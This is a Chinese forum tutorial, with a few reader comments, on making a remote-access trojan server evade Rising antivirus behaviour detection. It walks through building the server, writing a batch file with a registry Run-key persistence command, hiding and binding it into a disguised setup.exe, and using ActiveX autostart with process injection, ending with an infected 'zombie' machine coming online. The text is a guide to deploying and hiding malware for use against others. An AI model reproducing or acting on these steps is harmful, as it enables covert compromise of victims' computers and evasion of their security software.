此方法来源于甲壳虫技术论坛,免杀行为查杀软件,对所有的远控都是有效的,前提是服务端是免杀的。
对于黑防的鸽子修改“ZwUnmapViewOfSection”这里确实可以过瑞星的行为查杀,但是很容易造成无法上线。
解决方法如下:
步骤一:
在生成服务端的时候什么都不要选,也就是说,不要选删除自身,不要选插入注册表什么的,全都别选。
要是你选了,没法过行为查杀别找我。
如图:
步骤二:
现在我们生成的服务端是过行为的,但是却不能重启上线,我们就可以写一个批处理。
内容是”reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v llsilver /t REG_SZ /d C:\WINDOWS\llsilver.exe”
注意哦,这里的llsilver.exe是生成服务端时候安装路径的那个释放文件!
当然你也可以写Active启动,那样效果更好。
顺便说下ActiveX启动:采用ActiveX自启动处理的不好开机会出现提示。Active启动方式比较适合插进程的木马使用的启动招数。
解决方法:写HKEY_LOCAL_MACHINE,删HKEY_CURRENT_USER,自身文件运行后,完成插进程工作后速度退出。一般这样子搞就不会出现那个提示了。要快……退出的速度快到别人看不到就可以了。
所以说这种启动适合DLL型的木马,查句柄,插进程,退出。
步骤三:
打开“批处理潜行者”,点【目标BAT】,选择你的批处理,然后选择“无cmd窗口”,最后选择生成exe。
如图:
这样我们的隐藏批处理可执行文件就做好了。最后打开一个捆绑工具,(此文所用的和我提供的不是一个工具,图片中的这个会被杀。)宿主文件选择我们的服务端,捆绑文件就选我们做的隐藏批处理的可执行文件。
如图:
生成桌面的那个setup.exe就是我们最后要的服务端了啦!呵呵,运行成功过瑞星行为。
结果如图,肉鸡上线,同时也加入了注册表启动:
记忆盒子:
学夫子:
BoKeam:
youstar:
LAVA:
股票知识:
直接写入的注册表,这个应该360会检测到
很久没有折腾我的本本了。
Merry Christmas & Happy New Year!
那是灰鸽子吧,好久没玩过了!